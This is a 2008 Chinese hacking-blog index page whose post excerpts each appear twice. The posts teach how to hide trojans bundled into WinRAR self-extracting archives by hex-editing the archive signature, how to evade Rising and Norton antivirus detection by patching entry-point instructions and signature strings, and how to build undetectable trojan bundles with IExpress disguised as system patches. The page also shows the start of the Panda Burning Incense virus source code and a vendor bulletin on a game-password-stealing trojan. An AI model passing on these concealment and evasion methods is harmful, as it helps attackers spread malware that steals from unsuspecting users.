English Sentence Loading...
英语句子加载中...
利用WINRAR捆绑后的右键处理办法
[ 2008-10-14 22:50:22 | 作者: Admin ]
rar捆绑讨论
前提是木马绝对的免杀,这样做就能隐藏你很好的劳动成果!rarar捆绑后的完美解决.
前提是免杀的服务端,捆绑后就是做成自解压文件后,右键会出现一个“用WINRAR打开”的选项 如果别人真的打开了,那么我们的秘密不就暴露了吗?现在我们来解决它:
用到的工具:WINRAR WINHEX OD
以下就要开工了,用WINHEX打开它(目标:去除“用WINRAR打开”的选项)
查找rar!
rar!是WINRAR自解压文件识别压缩文件的标识
把查找到的rar!右边的16进制数值,也就是52 61 72 21
把其中的61改成60,保存文件
现在再看看,“用WINRAR打开”不见了,打开看看吧
压缩文件格式未知或已经损坏
压缩文件格式未知或已经损坏,损坏了,是因为他找不到压缩文件的标识,
我们用OD来修改吧~~~,用OD载入他
右键→查找→所有常量
输入52
...
阅读全文...
前提是木马绝对的免杀,这样做就能隐藏你很好的劳动成果!rarar捆绑后的完美解决.
前提是免杀的服务端,捆绑后就是做成自解压文件后,右键会出现一个“用WINRAR打开”的选项 如果别人真的打开了,那么我们的秘密不就暴露了吗?现在我们来解决它:
用到的工具:WINRAR WINHEX OD
以下就要开工了,用WINHEX打开它(目标:去除“用WINRAR打开”的选项)
查找rar!
rar!是WINRAR自解压文件识别压缩文件的标识
把查找到的rar!右边的16进制数值,也就是52 61 72 21
把其中的61改成60,保存文件
现在再看看,“用WINRAR打开”不见了,打开看看吧
压缩文件格式未知或已经损坏
压缩文件格式未知或已经损坏,损坏了,是因为他找不到压缩文件的标识,
我们用OD来修改吧~~~,用OD载入他
右键→查找→所有常量
输入52
...
阅读全文...
熊猫烧香(武汉男生)的病毒源码
[ 2008-09-04 06:02:05 | 作者: Admin ]
program Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = E8; //PE文件主图标的大小744字节
...uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = E8; //PE文件主图标的大小744字节
阅读全文...
木马免杀技术之独门绝技
[ 2008-07-09 04:08:38 | 作者: Admin ]
绝技一:快速搞定瑞星文件查杀
操作步骤:
第一步:用OD载入,来到程序的入口点。
第二步:把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞星的表面查杀。
绝技二:快速定位与修改瑞星内存特征码
原理:因为目前的内存查杀杀毒软件,只有瑞星才能威胁到我们的木马。也就是说只要搞定瑞星的内存查杀,那我们的木马在内存就畅通无阻了. 但由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,
这样对我们的定位和修改带来了方便.
操作步骤:
第一步:首先用特征码定位器大致定位出瑞星内存特征码位置.
第二步:然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.
绝技三:如何快速躲过诺顿的查杀
诺顿的查杀特点:大家...
阅读全文...
操作步骤:
第一步:用OD载入,来到程序的入口点。
第二步:把入口点的第一句PUSH EBP 改成POP EBP 然后保存就可以躲过瑞星的表面查杀。
绝技二:快速定位与修改瑞星内存特征码
原理:因为目前的内存查杀杀毒软件,只有瑞星才能威胁到我们的木马。也就是说只要搞定瑞星的内存查杀,那我们的木马在内存就畅通无阻了. 但由于技术原因,目前瑞星的内存特征码在90%以上把字符串作为病毒特征码,
这样对我们的定位和修改带来了方便.
操作步骤:
第一步:首先用特征码定位器大致定位出瑞星内存特征码位置.
第二步:然后用UE打开,找到这个大致位置,看看,哪些方面对应的是字符串,用0替换后再用内存查杀进行查杀.直到找到内存特征码后,只要把字符串的大小写互换就能达到内存免杀效果.
绝技三:如何快速躲过诺顿的查杀
诺顿的查杀特点:大家...
阅读全文...
近日网游盗号木马病毒播报
[ 2008-06-16 01:45:00 | 作者: Admin ]
以下是近日最新出现的网游盗号病毒:
“网游盗号木马61440”(Win32.Troj.OnlineGameT.nc.61440) 威胁级别:★
此病毒属于一个比较老的木马家族,但它的变种一直层出不穷。此篇预警播报中的变种在技术上与以前的版本没有什么不同,但它所袭击的电脑数量却较高。毒霸反病毒工程师认为这与它借助对抗型下载器传播有一定关系。
病毒进入用户电脑后,在系统盘中释放出两个病毒文件,分别是%WINDOWS%\目录下的fmsjhif.exe,以及%WINDOWS%\system32\目录下的fmsjhif.dll,前者是病毒主文件,会被写入注册表启动项,以实现自动启动。而后者是用来执行盗号工作的文件。
当成功运行起来,病毒就搜索《热血江湖》、《魔兽世界》和“游戏茶苑大厅”的进程,将fmsjhif.dll注入其中,读取帐号和密码信息。然后发送给病毒作者指定的地址。
...
阅读全文...
“网游盗号木马61440”(Win32.Troj.OnlineGameT.nc.61440) 威胁级别:★
此病毒属于一个比较老的木马家族,但它的变种一直层出不穷。此篇预警播报中的变种在技术上与以前的版本没有什么不同,但它所袭击的电脑数量却较高。毒霸反病毒工程师认为这与它借助对抗型下载器传播有一定关系。
病毒进入用户电脑后,在系统盘中释放出两个病毒文件,分别是%WINDOWS%\目录下的fmsjhif.exe,以及%WINDOWS%\system32\目录下的fmsjhif.dll,前者是病毒主文件,会被写入注册表启动项,以实现自动启动。而后者是用来执行盗号工作的文件。
当成功运行起来,病毒就搜索《热血江湖》、《魔兽世界》和“游戏茶苑大厅”的进程,将fmsjhif.dll注入其中,读取帐号和密码信息。然后发送给病毒作者指定的地址。
...
阅读全文...
木马传播者最惯用的手段就是将木马程序和合法程序捆绑在一起,欺骗被攻击者。然而,现在杀毒软件对捆绑类软件已显出“咄咄逼人”的态势,几乎所有的捆绑类软件都会被查杀,大大小小的木马纷纷失效。 IExpress小档案
出身:Microsoft
功能:专用于制作各种 CAB 压缩与自解压缩包的工具。
由于是Windows自带的程序,所以制作出来的安装包具有很好的兼容性。它可以帮助木马传播者制造不被杀毒软件查杀的自解压包,而且一般情况下还可伪装成某个系统软件的补丁(如IE的hotfix)来迷惑人。
到哪里寻找永远都不会被查杀的捆绑方法或工具?远在天边,近在眼前。可千万别忘了与你朝夕相处的Windows。此次所要介绍的捆绑工具就是Windows自带的一个小巧的软件IExpress(适用于2000和XP系统)。
原理
IExpress使用了多种不同的自解压缩文件技术对软件更新文...
阅读全文...
出身:Microsoft
功能:专用于制作各种 CAB 压缩与自解压缩包的工具。
由于是Windows自带的程序,所以制作出来的安装包具有很好的兼容性。它可以帮助木马传播者制造不被杀毒软件查杀的自解压包,而且一般情况下还可伪装成某个系统软件的补丁(如IE的hotfix)来迷惑人。
到哪里寻找永远都不会被查杀的捆绑方法或工具?远在天边,近在眼前。可千万别忘了与你朝夕相处的Windows。此次所要介绍的捆绑工具就是Windows自带的一个小巧的软件IExpress(适用于2000和XP系统)。
原理
IExpress使用了多种不同的自解压缩文件技术对软件更新文...
阅读全文...
1